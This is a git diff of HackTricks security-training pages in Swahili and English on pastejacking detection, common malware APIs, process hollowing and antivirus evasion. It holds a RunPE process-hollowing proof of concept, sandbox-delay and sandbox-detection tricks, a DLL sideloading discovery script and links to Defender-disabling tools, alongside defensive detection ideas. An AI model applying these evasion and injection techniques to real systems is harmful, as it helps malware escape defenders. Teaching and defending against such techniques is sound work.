Uchunguzi wa tishio
- Dailyrotating C2 hostnames and URLs with `.../Y/?t=<epoch>&v=5&p=<encoded_user_pc_firstinfection>` pattern.
- Changanisha clipboard write events zilizofuata na Win+R paste kisha kutekelezwa mara moja kwa `powershell.exe`.
Blue-teams wanaweza kuunganisha telemetry ya clipboard, process-creation na registry kutambua kwa usahihi matumizi mabaya ya pastejacking:
* Windows Registry: `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` inahifadhi historia ya **Win + R** amri tazama kwa maingizo ya Base64 yasiyo ya kawaida / yaliyofichwa.
* Security Event ID **4688** (Process Creation) ambapo `ParentImage` == `explorer.exe` na `NewProcessName` katika { `powershell.exe`, `wscript.exe`, `mshta.exe`, `curl.exe`, `cmd.exe` }.
* Event ID **4663** kwa uundaaji wa faili chini ya `%LocalAppData%\Microsoft\Windows\WinX\` au folda za muda kabla ya tukio la 4688 lenye shaka.
* EDR clipboard sensors (if present) changanisha `Clipboard Write` ikifuatiwa mara moja na mchakato mpya wa PowerShell.
## Mitigations
1. Browser hardening disable clipboard write-access (`dom.events.asyncClipboard.clipboardItem` etc.) or require user gesture.
2. Security awareness teach users to *type* sensitive commands or paste them into a text editor first.
3. PowerShell Constrained Language Mode / Execution Policy + Application Control to block arbitrary one-liners.
4. Network controls block outbound requests to known pastejacking and malware C2 domains.
1. Kuimarisha browser zima clipboard write-access (`dom.events.asyncClipboard.clipboardItem` etc.) au hitaji ishara ya mtumiaji.
2. Uhamasishaji wa usalama fundisha watumiaji ku-*type* amri nyeti au kuzimimina kwanza kwenye text editor.
3. PowerShell Constrained Language Mode / Execution Policy + Application Control ili kuzuia arbitrary one-liners.
4. Udhibiti wa mtandao ziba requests za outbound kwa domains za pastejacking zinazojulikana na C2 za malware.
## Related Tricks
* **Discord Invite Hijacking** often abuses the same ClickFix approach after luring users into a malicious server:
* **Discord Invite Hijacking** mara nyingi inatumia mbinu ile ile ya ClickFix baada ya kuvutwa kwa watumiaji kwenye server ya hatari:
{{#ref}}
discord-invite-hijacking.md
@ -85,5 +119,6 @@ discord-invite-hijacking.md
- [Fix the Click: Preventing the ClickFix Attack Vector](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/)
- [Pastejacking PoC GitHub](https://github.com/dxa4481/Pastejacking)
- [Check Point Research Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/)
{{#include ../../banners/hacktricks-training.md}}

126
src/reversing/common-api-used-in-malware.md
View File

@ -1,10 +1,10 @@
# Common API used in Malware
# API za kawaida zinazotumiwa katika Malware
{{#include ../banners/hacktricks-training.md}}
## Generic
## Za Kawaida
### Networking
### Mitandao
| Raw Sockets | WinAPI Sockets |
| ------------- | -------------- |
@ -17,7 +17,11 @@
| write() | send() |
| shutdown() | WSACleanup() |
### Persistence
### TLS pinning and chunked transport
Wapakiaji wengi huweka mkondo wao wa TCP ndani ya `SslStream` na ku-pin cheti la leaf la server dhidi ya nakala iliyowekwa ndani (certificate pinning). Taarifa na kazi za bot zimekandwa (kwa mfano, GZip). Wakati majibu yanapozidi kikomo (~1 MB), data hugawanywa katika vipande vidogo (kwa mfano, segmenti za 16 KB) ili kuepuka heuristics zinazotegemea ukubwa na kupunguza mwinuko wa kumbukumbu wakati wa deserialisation.
### Uendelevu
| Registry | File | Service |
| ---------------- | ------------- | ---------------------------- |
@ -27,7 +31,7 @@
| RegDeleteKeyEx() | WriteFile() | |
| RegGetValue() | ReadFile() | |
### Encryption
### Usimbaji
| Name |
| --------------------- |
@ -49,14 +53,31 @@
| CreateToolhelp32Snapshot \[Check if a process is running] | |
| CreateFileW/A \[Check if a file exist] | |
### Emulator API fingerprinting & sleep evasion
Malware mara nyingi hufanya fingerprinting ya sandbox emulators kwa kutafuta exports zilizounganishwa za Defender (zikiona katika Malware Protection Emulator). Ikiwa alama yoyote ya hizi zipo (skani isiyo na utofauti wa herufi kwenye mchakato), utekelezaji unasitishwa kwa dakika 1030 na kurejelezwa tena ili kuchosha muda wa uchunguzi.
Examples of API names used as canaries:
- `MpVmp32Entry`, `MpVmp32FastEnter`, `MpCallPreEntryPointCode`, `MpCallPostEntryPointCode`, `MpFinalize`, `MpReportEvent*`, `MpSwitchToNextThread*`
- `VFS_*` family: `VFS_Open`, `VFS_Read`, `VFS_MapViewOfFile`, `VFS_UnmapViewOfFile`, `VFS_FindFirstFile/FindNextFile`, `VFS_CopyFile`, `VFS_DeleteFile`, `VFS_MoveFile`
- `ThrdMgr_*`: `ThrdMgr_GetCurrentThreadHandle`, `ThrdMgr_SaveTEB`, `ThrdMgr_SwitchThreads`
Typical delay primitive (user-land):
```cmd
cmd /c timeout /t %RANDOM_IN_[600,1800]% > nul
```
Argument gatekeeping
- Waendeshaji mara nyingine wanahitaji kuwepo kwa swichi ya CLI inayoonekana isiyo hatari kabla ya kuendesha payload (mfano, `/i:--type=renderer` ili kuiga michakato ndogo ya Chromium). Ikiwa swichi haipo, loader inatoka mara moja, ikizuia utekelezaji wa sandbox isiyo ngumu.
### Stealth
| Name | |
| ------------------------ | -------------------------------------------------------------------------- |
| VirtualAlloc | Alloc memory (packers) |
| VirtualProtect | Change memory permission (packer giving execution permission to a section) |
| ReadProcessMemory | Injection into external processes |
| WriteProcessMemoryA/W | Injection into external processes |
| VirtualAlloc | Kuweka kumbukumbu (packers) |
| VirtualProtect | Badilisha ruhusa za kumbukumbu (packer inayotoa ruhusa za utekelezaji kwa sehemu) |
| ReadProcessMemory | Uingizaji ndani ya michakato ya nje |
| WriteProcessMemoryA/W | Uingizaji ndani ya michakato ya nje |
| NtWriteVirtualMemory | |
| CreateRemoteThread | DLL/Process injection... |
| NtUnmapViewOfSection | |
@ -75,70 +96,70 @@
### Miscellaneous
- GetAsyncKeyState() -- Key logging
- SetWindowsHookEx -- Key logging
- GetForeGroundWindow -- Get running window name (or the website from a browser)
- LoadLibrary() -- Import library
- GetProcAddress() -- Import library
- CreateToolhelp32Snapshot() -- List running processes
- GetDC() -- Screenshot
- BitBlt() -- Screenshot
- InternetOpen(), InternetOpenUrl(), InternetReadFile(), InternetWriteFile() -- Access the Internet
- FindResource(), LoadResource(), LockResource() -- Access resources of the executable
- GetAsyncKeyState() -- Kurekodi vitufe
- SetWindowsHookEx -- Kurekodi vitufe
- GetForeGroundWindow -- Pata jina la dirisha linaloendesha (au tovuti kutoka kwa kivinjari)
- LoadLibrary() -- Kupakia maktaba
- GetProcAddress() -- Kupata anuani ya proceduri (Import library)
- CreateToolhelp32Snapshot() -- Orodhesha michakato inayotekelezwa
- GetDC() -- Kuchukua screenshot
- BitBlt() -- Kuchukua screenshot
- InternetOpen(), InternetOpenUrl(), InternetReadFile(), InternetWriteFile() -- Kufikia Internet
- FindResource(), LoadResource(), LockResource() -- Kufikia rasilimali za executable
## Malware Techniques
### DLL Injection
Teua DLL isiyo ya kawaida ndani ya mchakato mwingine
Execute an arbitrary DLL inside another process
1. Tafuta mchakato wa kuingiza DLL mbaya: CreateToolhelp32Snapshot, Process32First, Process32Next
1. Pata mchakato wa kuingiza DLL hatarishi: CreateToolhelp32Snapshot, Process32First, Process32Next
2. Fungua mchakato: GetModuleHandle, GetProcAddress, OpenProcess
3. Andika njia ya DLL ndani ya mchakato: VirtualAllocEx, WriteProcessMemory
4. Unda thread katika mchakato ambayo itapakia DLL mbaya: CreateRemoteThread, LoadLibrary
4. Tengeneza thread ndani ya mchakato itakayopakia DLL hatarishi: CreateRemoteThread, LoadLibrary
Mifunction mingine ya kutumia: NTCreateThreadEx, RtlCreateUserThread
Vifunction vingine vya kutumia: NTCreateThreadEx, RtlCreateUserThread
### Reflective DLL Injection
Pakia DLL mbaya bila kuita simu za kawaida za Windows API.\
DLL inachorwa ndani ya mchakato, itatatua anwani za uagizaji, kurekebisha uhamasishaji na kuita kazi ya DllMain.
Load a malicious DLL without calling normal Windows API calls.\
The DLL is mapped inside a process, it will resolve the import addresses, fix the relocations and call the DllMain function.
### Thread Hijacking
Pata thread kutoka kwa mchakato na ufanye ipakie DLL mbaya
Find a thread from a process and make it load a malicious DLL
1. Pata thread lengwa: CreateToolhelp32Snapshot, Thread32First, Thread32Next
1. Tafuta thread lengwa: CreateToolhelp32Snapshot, Thread32First, Thread32Next
2. Fungua thread: OpenThread
3. Suspend thread: SuspendThread
4. Andika njia ya DLL mbaya ndani ya mchakato wa mwathirika: VirtualAllocEx, WriteProcessMemory
5. Anza tena thread ikipakia maktaba: ResumeThread
3. Simamisha thread: SuspendThread
4. Andika njia ya DLL hatarishi ndani ya mchakato wa mwathiriwa: VirtualAllocEx, WriteProcessMemory
5. Anzisha tena thread ili ipakie maktaba: ResumeThread
### PE Injection
Uhamasishaji wa Utekelezaji wa Portable: Utekelezaji utaandikwa katika kumbukumbu ya mchakato wa mwathirika na utaanzishwa kutoka hapo.
Portable Execution Injection: The executable will be written in the memory of the victim process and it will be executed from there.
### Process Hollowing (a.k.a **RunPE**)
`Process Hollowing` ni moja ya mbinu maarufu za **kuepuka ulinzi / utekelezaji** zinazotumiwa na malware ya Windows. Wazo ni kuzindua mchakato *halali* katika hali ya **kusimamishwa**, kuondoa (hollow) picha yake ya asili kutoka kwa kumbukumbu na nakala ya **PE isiyo ya kawaida** mahali pake. Wakati thread kuu hatimaye inarejelewa, kiingilio kibaya kinatekelezwa chini ya kivuli cha binary iliyoaminika (mara nyingi imesainiwa na Microsoft).
`Process Hollowing` is one of the favourite **defence-evasion / execution** tricks used by Windows malware. The idea is to launch a *legitimate* process in the **suspended** state, remove (hollow) its original image from memory and copy an **arbitrary PE** in its place. When the primary thread is finally resumed the malicious entry-point executes under the guise of a trusted binary (often signed by Microsoft).
Mchakato wa kawaida:
Mtiririko wa kawaida:
1. Zindua mwenyeji mzuri (mfano `RegAsm.exe`, `rundll32.exe`, `msbuild.exe`) **kusimamishwa** ili hakuna maagizo yanayoendesha bado.
1. Zindua mchakato halali (mfano `RegAsm.exe`, `rundll32.exe`, `msbuild.exe`) **suspended** ili hakuna maagizo yaendeshe bado.
```c
STARTUPINFOA si = { sizeof(si) };
PROCESS_INFORMATION pi;
CreateProcessA("C:\\Windows\\Microsoft.NET\\Framework32\\v4.0.30319\\RegAsm.exe",
NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
```
2. Soma mzigo mbaya katika kumbukumbu na uchambue vichwa vyake vya PE ili kupata `SizeOfImage`, sehemu na `EntryPoint` mpya.
3. **NtUnmapViewOfSection** / **ZwUnmapViewOfSection** ondoa msingi wa picha ya asili ya mchakato ulio kusimamishwa.
2. Soma payload hatarishi kwenye kumbukumbu na changanua vichwa vya PE ili kupata `SizeOfImage`, sections na `EntryPoint` mpya.
3. **NtUnmapViewOfSection** / **ZwUnmapViewOfSection** ondoa ramani ya msingi wa picha ya awali ya mchakato uliosimamishwa.
4. **VirtualAllocEx** hifadhi kumbukumbu ya RWX ya `SizeOfImage` ndani ya mchakato wa mbali.
5. **WriteProcessMemory** nakala ya `Headers` kwanza, kisha tembea juu ya sehemu ukinakili data zao za ghafi.
6. **SetThreadContext** pata thamani ya `EAX/RAX` (`RCX` kwenye x64) au `Rip` katika muundo wa muktadha ili `EIP` iangalie kwenye `EntryPoint` ya mzigo.
5. **WriteProcessMemory** nakili kwanza `Headers`, kisha pitia sections ukinakili data yao ghafi.
6. **SetThreadContext** rekebisha thamani ya `EAX/RAX` (`RCX` on x64) au `Rip` katika muundo wa context ili `EIP` iwekwe kwa `EntryPoint` ya payload.
7. **ResumeThread** thread inaendelea, ikitekeleza msimbo uliotolewa na mshambuliaji.
Mfano wa chini wa uthibitisho wa dhana (x86):
Mfano mdogo wa uthibitisho wa dhana (x86):
```c
void RunPE(LPCSTR host, LPVOID payload, DWORD payloadSize){
// 1. create suspended process
@ -164,30 +185,31 @@ SetThreadContext(pi.hThread,&ctx);
ResumeThread(pi.hThread);
}
```
Practical notes observed in the **DarkCloud Stealer** campaign:
Vidokezo vya vitendo vilivyobainika katika kampeni ya **DarkCloud Stealer**:
* Loader ilichukua `RegAsm.exe` (sehemu ya .NET Framework) kama mwenyeji binary iliyosainiwa ambayo haiwezekani kuvuta umakini.
* Stealer ya VB6 iliyofichuliwa (`holographies.exe`) *haiangushi* kwenye diski; inakuwepo tu ndani ya mchakato uliohollowed, ikifanya ugunduzi wa statiki kuwa mgumu zaidi.
* Nyimbo nyeti (regexes, paths, Telegram credentials) zime **RC4-encrypted** kwa kila nyimbo na zinafichuliwa tu wakati wa wakati wa kukimbia, ikifanya skanning ya kumbukumbu kuwa ngumu zaidi.
* The loader ilichagua `RegAsm.exe` (part of the .NET Framework) kama host binary iliyosainiwa isiyotarajiwa kuvutia umakini.
* The decrypted VB6 stealer (`holographies.exe`) haidondoshwi kwenye disk; ipo tu ndani ya hollowed process, ikifanya static detection iwe ngumu zaidi.
* Mfuatano wa maandishi nyeti (regexes, paths, Telegram credentials) umewekwa **RC4-encrypted** kwa kila string na huwekwa decrypted tu wakati wa runtime, ikifanya memory scanning kuwa tata zaidi.
Detection ideas:
* Onyo juu ya mchakato wa `CREATE_SUSPENDED` ambao kamwe hauunda madirisha ya GUI/console kabla ya eneo la kumbukumbu kutolewa kama **RWX** (nadra kwa msimbo mzuri).
Mawazo ya utambuzi:
* Alert juu ya `CREATE_SUSPENDED` processes ambazo hazitumii kuunda windows za GUI/console kabla eneo la memory linapopewa kama **RWX** (nadra kwa benign code).
* Tafuta mfuatano wa wito `NtUnmapViewOfSection ➜ VirtualAllocEx ➜ WriteProcessMemory` kati ya michakato tofauti.
## Hooking
- **SSDT** (**System Service Descriptor Table**) inaelekeza kwenye kazi za kernel (ntoskrnl.exe) au dereva wa GUI (win32k.sys) ili michakato ya mtumiaji iweze kuita kazi hizi.
- Rootkit inaweza kubadilisha viashiria hivi kwa anwani ambazo anadhibiti.
- **IRP** (**I/O Request Packets**) hupeleka vipande vya data kutoka sehemu moja hadi nyingine. Karibu kila kitu katika kernel kinatumia IRPs na kila kituo cha kifaa kina jedwali lake la kazi ambalo linaweza kuhooked: DKOM (Direct Kernel Object Manipulation)
- **IAT** (**Import Address Table**) ni muhimu kutatua utegemezi. Inawezekana kuhook jedwali hili ili kuiba msimbo ambao utaitwa.
- **EAT** (**Export Address Table**) Hooks. Hizi hooks zinaweza kufanywa kutoka **userland**. Lengo ni kuhook kazi zilizotolewa na DLLs.
- **Inline Hooks**: Aina hii ni ngumu kufikia. Hii inahusisha kubadilisha msimbo wa kazi yenyewe. Labda kwa kuweka jump mwanzoni mwa hii.
- The **SSDT** (**System Service Descriptor Table**) inaonyesha kwa kernel functions (ntoskrnl.exe) au GUI driver (win32k.sys) ili user processes ziweze kuita hizi functions.
- Rootkit inaweza kubadilisha pointer hizi kwa anwani anazodhibiti.
- The **IRP** (**I/O Request Packets**) hupitisha vipande vya data kutoka sehemu moja hadi nyingine. Karibu kila kitu katika kernel inatumia IRPs na kila device object ina jedwali la function ambalo linaweza ku-hook: DKOM (Direct Kernel Object Manipulation)
- The **IAT** (**Import Address Table**) ni muhimu kutatua dependencies. Inawezekana ku-hook table hii ili hijack code ambayo itaitekwa.
- **EAT** (**Export Address Table**) Hooks. Hizi hooks zinaweza kufanywa kutoka **userland**. Lengo ni ku-hook exported functions za DLLs.
- **Inline Hooks**: Aina hizi ni ngumu kufanikisha. Hii inahusisha kubadilisha code ya functions yenyewe, kwa mfano kwa kuweka jump mwanzoni mwa hizo functions.
## References
## Marejeo
- [Unit42 New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer](https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/)
- [Check Point Research Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/)
{{#include ../banners/hacktricks-training.md}}

489
src/windows-hardening/av-bypass.md
View File

@ -1,4 +1,4 @@
# Kuikwepa Antivirus (AV)
# Kuepuka Antivirus (AV) Bypass
{{#include ../banners/hacktricks-training.md}}
@ -6,99 +6,99 @@
## Zima Defender
- [defendnot](https://github.com/es3n1n/defendnot): Chombo cha kuzima Windows Defender ili isifanye kazi.
- [no-defender](https://github.com/es3n1n/no-defender): Chombo cha kuzima Windows Defender kwa kuigiza AV nyingine.
- [Disable Defender if you are admin](basic-powershell-for-pentesters/README.md)
- [defendnot](https://github.com/es3n1n/defendnot): Chombo cha kusimamisha Windows Defender kufanya kazi.
- [no-defender](https://github.com/es3n1n/no-defender): Chombo cha kusimamisha Windows Defender kufanya kazi kwa kudanganya AV nyingine.
- [Zima Defender ikiwa wewe ni admin](basic-powershell-for-pentesters/README.md)
## **AV Evasion Methodology**
## **Mbinu za Kuepuka AV**
Kwa sasa, AVs zinatumia njia tofauti za kukagua kama faili ni hatari au la: static detection, dynamic analysis, na kwa EDRs zilizo za juu zaidi, behavioural analysis.
Kwa sasa, AVs hutumia njia tofauti za kukagua ikiwa faili ni hatari au la: static detection, dynamic analysis, na kwa EDRs zilizo juu zaidi, behavioural analysis.
### **Static detection**
Static detection inafanyika kwa kupigia alama nyuzi au safu za bytes zinazojulikana kama hatari ndani ya binary au script, na pia kwa kutoa taarifa kutoka kwa faili yenyewe (mf. file description, company name, digital signatures, icon, checksum, n.k.). Hii inamaanisha kwamba kutumia zana za umma zilizo maarufu kunaweza kukufanya ugundulike kwa urahisi zaidi, kwa kuwa huenda zimetumikiwa na kuchambuliwa na kupigiwa alama kama hatari. Kuna njia kadhaa za kuepuka aina hii ya utambuzi:
Static detection inafikiwa kwa kuweka alama strings au arrays of bytes zinazojulikana kuwa hatari ndani ya binary au script, na pia kwa kutoa taarifa kutoka kwa faili yenyewe (mf. file description, company name, digital signatures, icon, checksum, n.k.). Hii inamaanisha kuwa kutumia public tools zinazojulikana kunaweza kukuletea kugunduliwa kwa urahisi zaidi, kwani huenda zimechambuliwa na kuwekwa alama kuwa hatari. Kuna njia chache za kuepuka aina hii ya detection:
- **Encryption**
Ikiwa utaficha (encrypt) binary, haitakuwa na njia AV za kugundua programu yako, lakini utahitaji aina fulani ya loader ili kuifungua (decrypt) na kuendesha programu ndani ya memory.
Ikiwa utaencrypt binary, haitakuwa na njia kwa AV kugundua programu yako, lakini utahitaji loader fulani ili kupatanisha (decrypt) na kuendesha programu kwenye memory.
- **Obfuscation**
Mara nyingine yote unayohitaji ni kubadilisha baadhi ya strings ndani ya binary au script yako ili kuepuka AV, lakini hii inaweza kuwa kazi inayochukua muda kulingana na unachojaribu kuficha.
Wakati mwingine kinachotakiwa ni kubadilisha baadhi ya strings kwenye binary au script yako ili ipite AV, lakini hii inaweza kuwa kazi inayoendelea na kuchukua muda kulingana na kile unachojaribu ku-obfuscate.
- **Custom tooling**
Ikiwa utatengeneza zana zako mwenyewe, haitakuwa na signatures mbaya zinazojulikana, lakini hii inachukua muda na juhudi nyingi.
> [!TIP]
> Njia nzuri ya kukagua kuhusiana na Windows Defender static detection ni [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck). Kwa kawaida inagawanya faili kuwa sehemu nyingi kisha inaagiza Defender iskanie kila sehemu kando-kando; kwa njia hii inaweza kukuambia hasa ni strings au bytes gani zilizo pangiliwa kama hatari kwenye binary yako.
> Njia nzuri ya kukagua dhidi ya static detection ya Windows Defender ni [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck). Kwa msingi, inagawa faili katika sehemu nyingi kisha inaagiza Defender iscan kila sehemu moja moja; kwa njia hii, inaweza kukuambia hasa ni strings au bytes gani zilizo na alama ndani ya binary yako.
Ninapendekeza sana uangalie [YouTube playlist](https://www.youtube.com/playlist?list=PLj05gPj8rk_pkb12mDe4PgYZ5qPxhGKGf) kuhusu AV Evasion ya vitendo.
Ninapendekeza sana uangalie hii [YouTube playlist](https://www.youtube.com/playlist?list=PLj05gPj8rk_pkb12mDe4PgYZ5qPxhGKGf) kuhusu practical AV Evasion.
### **Dynamic analysis**
Dynamic analysis ni pale ambapo AV inaendesha binary yako ndani ya sandbox na inatazama shughuli hatarishi (mf. kujaribu kufungua (decrypt) na kusoma nywila za browser yako, kufanya minidump kwenye LSASS, n.k.). Sehemu hii inaweza kuwa ngumu zaidi kufanya kazi nayo, lakini hizi ni baadhi ya mambo unaweza kufanya ili kuepuka sandboxes.
Dynamic analysis ni pale AV inapokimbisha binary yako ndani ya sandbox na kuangalia shughuli hatarishi (mf. kujaribu kupatanisha na kusoma passwords za browser yako, kufanya minidump kwenye LSASS, n.k.). Sehemu hii inaweza kuwa ngumu kidogo kufanya kazi nayo, lakini kuna baadhi ya mambo unaweza kuyafanya ili kuepuka sandboxes.
- **Sleep before execution** Kulingana na jinsi ilivyotekelezwa, inaweza kuwa njia nzuri ya kuepuka dynamic analysis ya AV. AV zina muda mfupi sana wa kuskania faili ili zisilete usumbufu kwa mtumiaji, hivyo kutumia sleeps ndefu kunaweza kuharibu uchambuzi wa binaries. Tatizo ni kwamba sandboxes za AV nyingi zinaweza kupita juu ya sleep kulingana na jinsi zilivyotekelezwa.
- **Checking machine's resources** Kawaida Sandboxes zina rasilimali chache sana za kutumia (mf. < 2GB RAM), vinginevyo zingesababisha kuzipunguza mashine za watumiaji. Unaweza pia kuwa mkali katika ubunifu hapa, kwa mfano kwa kuchunguza joto la CPU au hata kasi za fan; sio kila kitu kitatekelezwa ndani ya sandbox.
- **Machine-specific checks** Ikiwa unataka kulenga mtumiaji ambaye workstation yake imejiunga na domain ya "contoso.local", unaweza kufanya ukaguzi wa domain ya kompyuta kuona kama inalingana na ile uliyoainisha; ikiwa haifai, unaweza kufanya programu yako itoke.
- **Sleep before execution** Kulingana na jinsi imekotekwa, inaweza kuwa njia nzuri ya kuepuka dynamic analysis ya AV. AVs zina muda mfupi wa kuscan faili ili zisivurugie kazi za mtumiaji, kwa hivyo kutumia sleeps za muda mrefu kunaweza kuvuruga uchambuzi wa binaries. Tatizo ni kwamba sandboxes nyingi za AV zinaweza kuruka sleep hii kulingana na utekelezaji.
- **Checking machine's resources** Kawaida Sandboxes zina rasilimali ndogo za kufanya kazi nazo (mf. < 2GB RAM), vinginevyo zinaweza kupunguza kasi ya mashine ya mtumiaji. Unaweza pia kuwa mmbunifu hapa, kwa mfano kwa kukagua joto la CPU au hata kasi za fan, si kila kitu kitatekelezwa ndani ya sandbox.
- **Machine-specific checks** Ikiwa unataka kulenga mtumiaji ambaye workstation yake imejiunga na domain "contoso.local", unaweza kuangalia domain ya kompyuta kuona kama inalingana na ile uliyotaja; ikiwa haitalingani, unaweza kufanya programu yako itoke.
Imebainika kuwa computername ya Microsoft Defender's Sandbox ni HAL9TH, hivyo unaweza kuangalia jina la kompyuta kwenye malware yako kabla ya detonation; ikiwa jina linafanana na HAL9TH, inamaanisha uko ndani ya defender's sandbox, hivyo unaweza kufanya programu yako itoke.
Inaonekana kuwa Sandbox ya Microsoft Defender ina computername HAL9TH, hivyo, unaweza kuangalia jina la kompyuta kwenye malware yako kabla ya detonation; ikiwa jina linalingana na HAL9TH, inamaanisha uko ndani ya sandbox ya defender, basi unaweza kufanya programu yako itoke.
<figure><img src="../images/image (209).png" alt=""><figcaption><p>chanzo: <a href="https://youtu.be/StSLxFbVz0M?t=1439">https://youtu.be/StSLxFbVz0M?t=1439</a></p></figcaption></figure>
Mikono mingine ya ushauri mzuri kutoka kwa [@mgeeky](https://twitter.com/mariuszbit) kuhusu kukabiliana na Sandboxes
Mambo mengine mazuri kutoka kwa [@mgeeky](https://twitter.com/mariuszbit) juu ya kukabiliana na Sandboxes
<figure><img src="../images/image (248).png" alt=""><figcaption><p><a href="https://discord.com/servers/red-team-vx-community-1012733841229746240">Red Team VX Discord</a> #malware-dev channel</p></figcaption></figure>
Kama tulivyosema hapo awali kwenye chapisho hili, **public tools** hatimaye zitakuwa **detected**, kwa hivyo, unapaswa kuuliza swali:
Kama tulivyosema hapo awali kwenye post hii, **public tools** hatimaye zitagunduliwa, kwa hivyo, unapaswa kuuliza swali:
Kwa mfano, ikiwa unataka dump LSASS, **je, lazima utumie mimikatz**? Au unaweza kutumia mradi mwingine usiojulikana sana ambao pia huunda dump ya LSASS.
Kwa mfano, ikiwa unataka dump LSASS, **je, kweli unahitaji kutumia mimikatz**? Au unaweza kutumia mradi tofauti ambao haujulikani sana na pia unaweza kufanya dump ya LSASS?
Jibu sahihi labda ni la pili. Kuchukua mimikatz kama mfano, huenda ni mojawapo ya, kama siyo ile iliyopigwa alama zaidi na AVs na EDRs; mradi wenyewe ni mzuri sana, lakini pia ni taabu kuufanya ufanye kazi ili kuzunguka AVs, hivyo tafuta mbadala kwa kile unachojaribu kufanikisha.
Jibu sahihi labda ni hili la mwisho. Kuchukua mimikatz kama mfano, pengine ni mojawapo, ikiwa sio ile inayopatwa zaidi na AVs na EDRs, mradi huo kwa ujumla ni mzuri sana, lakini pia ni shida kubwa kuifanya ipite AVs, kwa hivyo tafuta mbadala kwa kile unachojaribu kufanikisha.
> [!TIP]
> Unapobadilisha payloads zako kwa ajili ya evasion, hakikisha **uzima automatic sample submission** katika defender, na tafadhali, kwa uzito, **DO NOT UPLOAD TO VIRUSTOTAL** ikiwa lengo lako ni kupata evasion kwa muda mrefu. Ikiwa unataka kukagua kama payload yako inagundulika na AV fulani, iweke kwenye VM, jaribu kuzima automatic sample submission, na iteste huko hadi utakapokuwa una kuridhika na matokeo.
> Unapobadilisha payloads zako kwa ajili ya evasion, hakikisha **uzima automatic sample submission** ndani ya defender, na tafadhali, kwa msaada, **USIPAKIE VIRUSTOTAL** ikiwa lengo lako ni kufanikiwa kuepuka kwa muda mrefu. Ikiwa unataka kuangalia kama payload yako inagunduliwa na AV maalum, install yake kwenye VM, jaribu kuzima automatic sample submission, na iteste huko hadi utakapokuwa na matokeo unayoyataka.
## EXEs vs DLLs
Pale panapowezekana, daima **peana kipaumbele kwa kutumia DLLs kwa evasion**, kwa uzoefu wangu, faili za DLL kwa kawaida huwa **zinagundulika kidogo zaidi** na kuchambuliwa kidogo, kwa hivyo ni mbinu rahisi kutumia kuepuka utambuzi katika baadhi ya kesi (ikiwa payload yako ina njia ya kuendeshwa kama DLL bila shaka).
Iwapo inawezekana, daima **pendelea kutumia DLLs kwa evasion**, kwa uzoefu wangu, faili za DLL mara nyingi huwa **zinagunduliwa kidogo zaidi** na kuchambuliwa, hivyo ni mbinu rahisi sana ya kuepuka utambuzi katika baadhi ya kesi (ikiwa payload yako ina njia ya kuendesha kama DLL bila shaka).
Kama tunaona kwenye picha hii, DLL Payload kutoka Havoc ina detection rate ya 4/26 kwenye antiscan.me, wakati EXE payload ina detection rate ya 7/26.
Kama tunaweza kuona kwenye picha hii, DLL Payload kutoka Havoc ina detection rate ya 4/26 katika antiscan.me, wakati EXE payload ina detection rate ya 7/26.
<figure><img src="../images/image (1130).png" alt=""><figcaption><p>mfanano wa antiscan.me wa Havoc EXE payload ya kawaida dhidi ya Havoc DLL ya kawaida</p></figcaption></figure>
<figure><img src="../images/image (1130).png" alt=""><figcaption><p>antiscan.me comparison of a normal Havoc EXE payload vs a normal Havoc DLL</p></figcaption></figure>
Sasa tutaonyesha baadhi ya mbinu unaweza kutumia na faili za DLL ili kuwa stealth zaidi.
Sasa tutaonyesha baadhi ya mbinu unaweza kutumia na faili za DLL kuwa na utata zaidi.
## DLL Sideloading & Proxying
**DLL Sideloading** inatumia mpangilio wa utafutaji wa DLL unaotumika na loader kwa kuweka programu ya mwathiriwa na malicious payload(s) kando kwa kando.
**DLL Sideloading** inatumia mvutano wa DLL search order unaotumika na loader kwa kuweka programu ya mwathiriwa na payload(za) haribifu pembeni kwa kila mmoja.
Unaweza kukagua programu zinazoweza kuathiriwa na DLL Sideloading ukitumia [Siofra](https://github.com/Cybereason/siofra) na powershell script ifuatayo:
Unaweza kukagua programu zinazoweza kuwa rahisi kwa DLL Sideloading kutumia [Siofra](https://github.com/Cybereason/siofra) na powershell script ifuatayo:
```bash
Get-ChildItem -Path "C:\Program Files\" -Filter *.exe -Recurse -File -Name| ForEach-Object {
$binarytoCheck = "C:\Program Files\" + $_
C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hijack -f $binarytoCheck
}
```
Amri hii itaonyesha orodha ya programu zinazoweza kuathiriwa na DLL hijacking ndani ya "C:\Program Files\\" na faili za DLL ambazo zinajaribu kupakia.
Amri hii itatoa orodha ya programu zinazoweza kuathiriwa na DLL hijacking ndani ya "C:\Program Files\\" na faili za DLL zinazojaribu kupakia.
Ninapendekeza kwa nguvu **explore DLL Hijackable/Sideloadable programs yourself**, mbinu hii ni ya kimyakimya ikiwa itafanywa vizuri, lakini ukitumia programu za DLL Sideloadable zinazojulikana hadharani, unaweza kukamatwa kwa urahisi.
Ninapendekeza kwa nguvu utafute mwenyewe **DLL Hijackable/Sideloadable programs**, mbinu hii ni ya kimya ikiwa itafanywa vizuri, lakini ikiwa utatumia DLL Sideloadable programs zilizojulikana kwa umma, unaweza kukamatwa kwa urahisi.
Kuweka tu DLL mbaya yenye jina ambalo programu inatarajia kupakia haitapakia payload yako, kwa sababu programu inatarajia functions maalum ndani ya DLL hiyo; ili kurekebisha tatizo hili, tutatumia mbinu nyingine inayoitwa **DLL Proxying/Forwarding**.
Kwa kuweka tu DLL hatari yenye jina ambalo programu inatarajia kupakia, haitapakia payload yako, kwani programu inatarajia baadhi ya kazi maalum ndani ya DLL hiyo; kutatua tatizo hili, tutatumia mbinu nyingine inayoitwa **DLL Proxying/Forwarding**.
**DLL Proxying** inapitisha miito ambazo programu inazofanya kutoka kwenye proxy (na DLL hatari) kwenda kwa DLL ya asili, hivyo kudumisha utendakazi wa programu na kuwezesha kushughulikia utekelezaji wa payload yako.
